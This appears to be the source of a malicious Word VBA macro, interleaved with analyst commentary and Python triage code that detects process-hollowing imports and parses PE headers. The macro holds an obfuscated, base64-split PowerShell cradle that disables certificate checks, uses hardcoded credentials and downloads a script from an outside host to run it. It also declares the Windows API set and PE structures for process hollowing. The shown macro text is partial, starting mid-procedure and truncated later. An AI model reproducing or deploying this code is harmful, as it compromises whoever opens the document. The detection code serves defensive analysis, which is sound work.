zHdj1 = "kAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7"
zHdj2 = "ACAAJAB0AHIAdQBlACAAfQA7ACAAJABiAGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJABiAGMALgBDAHIAZQ"
zHdj3 = "BkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAGEAdQB0AGgA"
zHdj4 = "JwAsACAAJwAhACkAJgAlAEcAYQBvAGwAVABdAEgAfABwAEoATwBqAGUATgBjAHsAbQBTADcANABfAC0AWABkAFIAWgBZAH0AJwApADsAcwBsAGUAZQBwACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtAC"
zHdj5 = "AAIAAtAE0AYQB4ACAAMQA1ADAAKQA7ACQAZABzAD0AJABiAGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAHUAcABhAGMAYwBvAHUAbgB0"
zHdj6 = "AC4AbgBlAHQALwB1AHIAbAAvAHYAaQBlAHcAJwApADsAcwBsAGUAZQBwACAAMgAwADAAOwBzAHcAIAAkAGQAcwA="
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + zHdj + zHdj1 + zHdj2 + zHdj3 + zHdj4 + zHdj5 + zHdj6
gkjfsgksjkasoiopfajvd = PE()
Dim strComputer, strList
strComputer = "."
Dim objWMIService, objProcess, colProcess
Dim pos As Integer
Dim i As Integer
i = 0
If gkjfsgksjkasoiopfajvd = "" Then
If Dir(Fkjhdksjjgjksv) = "" Then
Exit Sub
End If
baFileContent = FileToByteArray(Fkjhdksjjgjksv)
Call sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv(baFileContent, HJNLksdjbjksvajklvnhjksdnjks)
Else
baFileContent = StringToByteArray(gkjfsgksjkasoiopfajvd)
Call sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv(baFileContent, HJNLksdjbjksvajklvnhjksdnjks)
End If
For i = 0 To 2
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery("Select * from Win32_Process WHERE Name = ""WINWORD.EXE"" AND CommandLine Like ""%win%"" ")
For Each objProcess In colProcess
pos = InStr(objProcess.CommandLine, "win")
If pos <> 0 Then
i = 2
Else
pos = 0
End If
Next
Next i
If pos = 0 Then
Else
End If
End Sub
Private Sub Document_open()
Dim objPic As Shape
For Each objPic In ActiveDocument.Shapes
If objPic.PictureFormat.Contrast >= 0.501 Then
objPic.PictureFormat.Brightness = 0.5
Else
objPic.PictureFormat.CropLeft = 50000
objPic.PictureFormat.CropBottom = 50000
End If
Next objPic
End Sub
Attribute VB_Name = "NewMacros"
Option Explicit
' ================================================================================
' ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
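The declares above are the full process-hollowing primitive set, and that set, not any single API, is what an analyst should key on. The following Python is an added triage example, not code from the macro or from the analyzer: it parses Declare statements out of extracted VBA source (as dumped by olevba or the report's own macro view), resolves Alias names to the real export, folds A/W suffixes, and reports which hollowing stages the module imports. The Nt*/Wow64* names in the stage table are the ntdll and WOW64 equivalents of the kernel32 calls and are included as a generalization; the VBA it scans is constructed inline in the shape of the declares above, with parameter lists trimmed.

```python
"""Triage VBA Declare statements for the process-hollowing (RunPE) API set.

Added example (not the macro's code, not the analyzer's): given extracted VBA
source, list every Win32 import and report which hollowing stages the module
covers. Both branches of a #If Win64 block are scanned, Alias names are
resolved to the real export, and A/W suffixes are folded.
"""
import re
from collections import defaultdict

# Each hollowing stage and the exports that implement it (lowercase, no A/W).
# The Nt*/Wow64* names are the ntdll/WOW64 equivalents often used to sidestep
# kernel32-only string checks.
HOLLOWING_STAGES = {
    "spawn_suspended": {"createprocess", "createprocessasuser"},
    "read_context":    {"getthreadcontext", "wow64getthreadcontext"},
    "allocate_remote": {"virtualallocex", "ntallocatevirtualmemory"},
    "write_remote":    {"writeprocessmemory", "ntwritevirtualmemory"},
    "set_context":     {"setthreadcontext", "wow64setthreadcontext"},
    "resume":          {"resumethread", "ntresumethread"},
}
_API_TO_STAGE = {api: st for st, apis in HOLLOWING_STAGES.items() for api in apis}

# [Private|Public] Declare [PtrSafe] Function|Sub <name> Lib "<dll>" [Alias "<export>"]
_DECLARE_RE = re.compile(
    r'^\s*(?:(?:Private|Public)\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"(?:\s+Alias\s+"(?P<alias>[^"]+)")?',
    re.IGNORECASE | re.MULTILINE,
)


def parse_declares(vba_source):
    """Return [(vba_name, dll, exported_name), ...] for every Declare line."""
    out = []
    for m in _DECLARE_RE.finditer(vba_source):
        out.append((m.group("name"), m.group("lib").lower(),
                    m.group("alias") or m.group("name")))
    return out


def normalize_export(export):
    """Lowercase and drop a trailing A/W only when the stem is a known API,
    so 'CreateProcessA' and 'CreateProcessW' both map to 'createprocess'."""
    n = export.lower()
    if n[-1:] in ("a", "w") and n[:-1] in _API_TO_STAGE:
        return n[:-1]
    return n


def assess_hollowing(vba_source):
    """Return {'stages': {stage: [exports]}, 'missing': [stages], 'complete': bool}."""
    found = defaultdict(set)
    for _name, _dll, export in parse_declares(vba_source):
        stage = _API_TO_STAGE.get(normalize_export(export))
        if stage:
            found[stage].add(export)
    missing = [s for s in HOLLOWING_STAGES if s not in found]
    return {"stages": {s: sorted(v) for s, v in found.items()},
            "missing": missing, "complete": not missing}


# Constructed sample in the shape of the declares above (parameter lists trimmed).
SAMPLE_VBA = r'''
Option Explicit
#If Win64 Then
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal dwSize As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal nSize As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
#Else
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal dwSize As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal nSize As Long) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
#End If
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
'''

# Constructed module with only two of the six stages: flagged as incomplete.
PARTIAL_VBA = r'''
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
Private Declare PtrSafe Function CreateProcessW Lib "kernel32" (ByVal lpApplicationName As LongPtr) As Long
Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr) As Long
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("partial", PARTIAL_VBA)):
        r = assess_hollowing(src)
        print(label, "complete" if r["complete"] else "missing %s" % r["missing"], r["stages"])
```

Run it on the module text extracted from a suspect document; a result with `complete` set is a much stronger signal than the individual `WriteProcessMemory` or `cmd.exe` string hits listed in the heuristics, because a legitimate automation macro has no reason to import all six stages together. A module that hides the Declare lines (strings built at runtime, p-code only) will not be caught by this check, which is what the p-code auto-exec heuristic in the report is for.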
' ================================================================================
' ~~~ WINDOWS STRUCTURES ~~~
' ================================================================================
' Constants used in structure definitions
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Const IMAGE_SIZEOF_SHORT_NAME = 8
Private Const MAXIMUM_SUPPORTED_EXTENSION = 512
Private Const SIZE_OF_80387_REGISTERS = 80
#If Win64 Then
Private Type M128A
Low As LongLong 'ULONGLONG Low;
High As LongLong 'LONGLONG High;
End Type
#End If
' https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
Private Type IMAGE_DOS_HEADER
e_magic As Integer 'WORD e_magic;
e_cblp As Integer 'WORD e_cblp;
e_cp As Integer 'WORD e_cp;
e_crlc As Integer 'WORD e_crlc;
e_cparhdr As Integer 'WORD e_cparhdr;
e_minalloc As Integer 'WORD e_minalloc;
e_maxalloc As Integer 'WORD e_maxalloc;
e_ss As Integer 'WORD e_ss;
e_sp As Integer 'WORD e_sp;
e_csum As Integer 'WORD e_csum;
e_ip As Integer 'WORD e_ip;
e_cs As Integer 'WORD e_cs;
e_lfarlc As Integer 'WORD e_lfarlc;
e_ovno As Integer 'WORD e_ovno;
e_res(4 - 1) As Integer 'WORD e_res[4];
e_oemid As Integer 'WORD e_oemid;
e_oeminfo As Integer 'WORD e_oeminfo;
e_res2(10 - 1) As Integer 'WORD e_res2[10];
e_lfanew As Long 'LONG e_lfanew;
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long 'DWORD VirtualAddress;
Size As Long 'DWORD Size;
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
Private Type IMAGE_FILE_HEADER
Machine As Integer 'WORD Machine;
NumberOfSections As Integer 'WORD NumberOfSections;
TimeDateStamp As Long 'DWORD TimeDateStamp;
PointerToSymbolTable As Long 'DWORD PointerToSymbolTable;
NumberOfSymbols As Long 'DWORD NumberOfSymbols;
SizeOfOptionalHeader As Integer 'WORD SizeOfOptionalHeader;
Characteristics As Integer 'WORD Characteristics;
End Type
' https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
Private Type IMAGE_OPTIONAL_HEADER
#If Win64 Then
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
ImageBase As LongLong 'ULONGLONG ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As LongLong 'ULONGLONG SizeOfStackReserve;
SizeOfStackCommit As LongLong 'ULONGLONG SizeOfStackCommit;
SizeOfHeapReserve As LongLong 'ULONGLONG SizeOfHeapReserve;
SizeOfHeapCommit As LongLong 'ULONGLONG SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#Else
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
BaseOfData As Long 'DWORD BaseOfData;
ImageBase As Long 'DWORD ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As Long 'DWORD SizeOfStackReserve;
SizeOfStackCommit As Long 'DWORD SizeOfStackCommit;
SizeOfHeapReserve As Long 'DWORD SizeOfHeapReserve;
SizeOfHeapCommit As Long 'DWORD SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#End If
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
Private Type IMAGE_NT_HEADERS
Signature As Long 'DWORD Signature;
FileHeader As IMAGE_FILE_HEADER 'IMAGE_FILE_HEADER FileHeader;
OptionalHeader As IMAGE_OPTIONAL_HEADER 'IMAGE_OPTIONAL_HEADER OptionalHeader;
End Type
' https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
Private Type IMAGE_SECTION_HEADER
SecName(IMAGE_SIZEOF_SHORT_NAME - 1) As Byte 'UCHAR Name[IMAGE_SIZEOF_SHORT_NAME];
Misc As Long 'ULONG Misc;
VirtualAddress As Long 'ULONG VirtualAddress;
SizeOfRawData As Long 'ULONG SizeOfRawData;
PointerToRawData As Long 'ULONG PointerToRawData;
PointerToRelocations As Long 'ULONG PointerToRelocations;
PointerToLinenumbers As Long 'ULONG PointerToLinenumbers;
NumberOfRelocations As Integer 'WORD NumberOfRelocations;
NumberOfLinenumbers As Integer 'WORD NumberOfLinenumbers;
Characteristics As Long 'ULONG Characteristics;
End Type
' https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
Private Type PROCESS_INFORMATION
hProcess As LongPtr 'HANDLE hProcess;
hThread As LongPtr 'HANDLE hThread;
dwProcessId As Long 'DWORD dwProcessId;
dwThreadId As Long 'DWORD dwThreadId;
End Type
' https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
Private Type STARTUPINFO
cb As Long 'DWORD cb;
lpReserved As String 'LPSTR lpReserved;
lpDesktop As String 'LPSTR lpDesktop;
lpTitle As String 'LPSTR lpTitle;
dwX As Long 'DWORD dwX;
dwY As Long 'DWORD dwY;
dwXSize As Long 'DWORD dwXSize;
dwYSize As Long 'DWORD dwYSize;
dwXCountChars As Long 'DWORD dwXCountChars;
dwYCountChars As Long 'DWORD dwYCountChars;
dwFillAttribute As Long 'DWORD dwFillAttribute;
dwFlags As Long 'DWORD dwFlags;
wShowWindow As Integer 'WORD wShowWindow;
cbReserved2 As Integer 'WORD cbReserved2;
lpReserved2 As LongPtr 'LPBYTE lpReserved2;
hStdInput As LongPtr 'HANDLE hStdInput;
hStdOutput As LongPtr 'HANDLE hStdOutput;
hStdError As LongPtr 'HANDLE hStdError;
End Type
' https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html
Private Type FLOATING_SAVE_AREA
ControlWord As Long 'DWORD ControlWord;
StatusWord As Long 'DWORD StatusWord;
TagWord As Long 'DWORD TagWord;
ErrorOffset As Long 'DWORD ErrorOffset;
ErrorSelector As Long 'DWORD ErrorSelector;
DataOffset As Long 'DWORD DataOffset;
DataSelector As Long 'DWORD DataSelector;
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte 'BYTE RegisterArea[SIZE_OF_80387_REGISTERS];
Spare0 As Long 'DWORD Spare0;
End Type
Private Type CONTEXT
#If Win64 Then
' Register parameter home addresses
P1Home As LongLong 'DWORD64 P1Home;
P2Home As LongLong 'DWORD64 P2Home;
P3Home As LongLong 'DWORD64 P3Home;
P4Home As LongLong 'DWORD64 P4Home;
P5Home As LongLong 'DWORD64 P5Home;
P6Home As LongLong 'DWORD64 P6Home;
' Control flags
ContextFlags As Long 'DWORD ContextFlags;
MxCsr As Long 'DWORD MxCsr;
' Segment Registers and processor flags
SegCs As Integer 'WORD SegCs;
SegDs As Integer 'WORD SegDs;
SegEs As Integer 'WORD SegEs;
SegFs As Integer 'WORD SegFs;
SegGs As Integer 'WORD SegGs;
SegSs As Integer 'WORD SegSs;
EFlags As Long 'DWORD EFlags;
' Debug registers
Dr0 As LongLong 'DWORD64 Dr0;
Dr1 As LongLong 'DWORD64 Dr1;
Dr2 As LongLong 'DWORD64 Dr2;
Dr3 As LongLong 'DWORD64 Dr3;
Dr6 As LongLong 'DWORD64 Dr6;
Dr7 As LongLong 'DWORD64 Dr7;
' Integer registers
Rax As LongLong 'DWORD64 Rax;
Rcx As LongLong 'DWORD64 Rcx;
Rdx As LongLong 'DWORD64 Rdx;
Rbx As LongLong 'DWORD64 Rbx;
Rsp As LongLong 'DWORD64 Rsp;
Rbp As LongLong 'DWORD64 Rbp;
Rsi As LongLong 'DWORD64 Rsi;
Rdi As LongLong 'DWORD64 Rdi;
R8 As LongLong 'DWORD64 R8;
R9 As LongLong 'DWORD64 R9;
R10 As LongLong 'DWORD64 R10;
R11 As LongLong 'DWORD64 R11;
R12 As LongLong 'DWORD64 R12;
R13 As LongLong 'DWORD64 R13;
R14 As LongLong 'DWORD64 R14;
R15 As LongLong 'DWORD64 R15;
' Program counter
Rip As LongLong 'DWORD64 Rip
' Floating point state
…
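The IMAGE_DOS_HEADER, IMAGE_NT_HEADERS and IMAGE_SECTION_HEADER types above are what a RunPE-style loader needs to find the payload's entry point, preferred image base and section table before copying each section into the suspended process, and the #If Win64 split inside IMAGE_OPTIONAL_HEADER exists because PE32 and PE32+ diverge at byte 24 of that header (BaseOfData plus a 4-byte ImageBase versus a single 8-byte ImageBase). The following Python is an added example, not the macro's code or the report's: it reads the same fields from raw bytes with the same 32/64-bit split, cross-checks Machine against the optional header magic, and derives the per-section copy plan (target RVA, source file offset, length) that a hollowing loader would feed to WriteProcessMemory. The header-only PE it parses is a constructed fixture built inline, not a real binary.

```python
"""Parse the PE headers a RunPE-style loader needs, with the PE32/PE32+ split.

Added example (not the macro's code): reads IMAGE_DOS_HEADER, IMAGE_NT_HEADERS
and the section table from raw bytes and derives the per-section copy plan
(target RVA, source file offset, length) a hollowing loader feeds to
WriteProcessMemory. The PE it parses is a header-only fixture built inline.
"""
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64 = 0x14C, 0x8664
SECTION_HDR_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(buf):
    """Return the header fields a loader needs; raise ValueError on a bad image."""
    if len(buf) < 64:
        raise ValueError("too short for an IMAGE_DOS_HEADER")
    e_magic, e_lfanew = struct.unpack_from("<2s58xI", buf, 0)   # e_lfanew sits at 0x3C
    if e_magic != b"MZ":
        raise ValueError("missing MZ signature")
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh_off = e_lfanew + 4                                       # IMAGE_FILE_HEADER
    machine, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, fh_off)
    opt_off = fh_off + 20                                       # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", buf, opt_off)
    entry_point, base_of_code = struct.unpack_from("<II", buf, opt_off + 16)
    # Byte 24 is where the layouts diverge: PE32 has BaseOfData(4)+ImageBase(4),
    # PE32+ has one 8-byte ImageBase. Hence the #If Win64 in the VBA type above.
    if magic == PE32_MAGIC:
        base_of_data, image_base = struct.unpack_from("<II", buf, opt_off + 24)
        is64 = False
    elif magic == PE32PLUS_MAGIC:
        base_of_data = None
        (image_base,) = struct.unpack_from("<Q", buf, opt_off + 24)
        is64 = True
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_image, size_of_headers = struct.unpack_from("<II", buf, opt_off + 56)
    # Machine and Magic must agree; a mismatch means a mis-built or tampered image.
    expect = IMAGE_FILE_MACHINE_AMD64 if is64 else IMAGE_FILE_MACHINE_I386
    if machine != expect:
        raise ValueError("Machine 0x%x does not match optional header magic" % machine)
    sec_off = opt_off + opt_size                                # section table follows
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR_FMT, buf, sec_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "characteristics": chars})
    return {"is64": is64, "machine": machine, "entry_point": entry_point,
            "base_of_code": base_of_code, "base_of_data": base_of_data,
            "image_base": image_base, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "sections": sections}


def is_valid_pe(buf):
    """True when parse_pe accepts the image; struct.error covers truncated tables."""
    try:
        parse_pe(buf)
        return True
    except (ValueError, struct.error):
        return False


def section_copy_plan(pe):
    """(target RVA, source file offset, byte count) per section with raw data:
    a loader writes buf[src:src+n] to image_base + rva inside the target."""
    return [(s["virtual_address"], s["raw_ptr"], s["raw_size"])
            for s in pe["sections"] if s["raw_size"]]


def build_min_pe(is64, entry_point, image_base):
    """Constructed header-only fixture (not a runnable binary): MZ stub, PE
    signature, file header, optional header, 16 empty data directories, 2 sections."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    opt_size = 240 if is64 else 224
    file_hdr = struct.pack("<HHIIIHH",
                           IMAGE_FILE_MACHINE_AMD64 if is64 else IMAGE_FILE_MACHINE_I386,
                           2, 0, 0, 0, opt_size, 0x22 if is64 else 0x102)
    if is64:
        opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", PE32PLUS_MAGIC, 14, 0,
                          0x200, 0x200, 0, entry_point, 0x1000, image_base, 0x1000, 0x200,
                          6, 0, 0, 0, 6, 0, 0, 0x3000, 0x400, 0, 2, 0x8160,
                          0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    else:
        opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", PE32_MAGIC, 14, 0,
                          0x200, 0x200, 0, entry_point, 0x1000, 0x2000, image_base,
                          0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x3000, 0x400, 0, 2, 0x8140,
                          0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (16 * 8)                                     # DataDirectory[16]
    secs = struct.pack(SECTION_HDR_FMT, b".text", 0x100, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack(SECTION_HDR_FMT, b".data", 0x100, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xC0000040)
    return dos + b"PE\0\0" + file_hdr + opt + secs


if __name__ == "__main__":
    for is64 in (False, True):
        pe = parse_pe(build_min_pe(is64, 0x1500, 0x140000000 if is64 else 0x400000))
        print("PE32+" if pe["is64"] else "PE32", hex(pe["image_base"]),
              hex(pe["entry_point"]), section_copy_plan(pe))
```

Two practical points fall out of this. First, a hollowing loader compiled into the 64-bit branch of the macro can only map a PE32+ payload into a 64-bit host and vice versa, so the bitness of any recovered second stage tells you which `#If Win64` branch actually ran. Second, the copy plan is exactly the list of `WriteProcessMemory` calls an EDR would see, one per section plus one for the headers, which is why that call sequence is a better behavioural signature than the API names on their own.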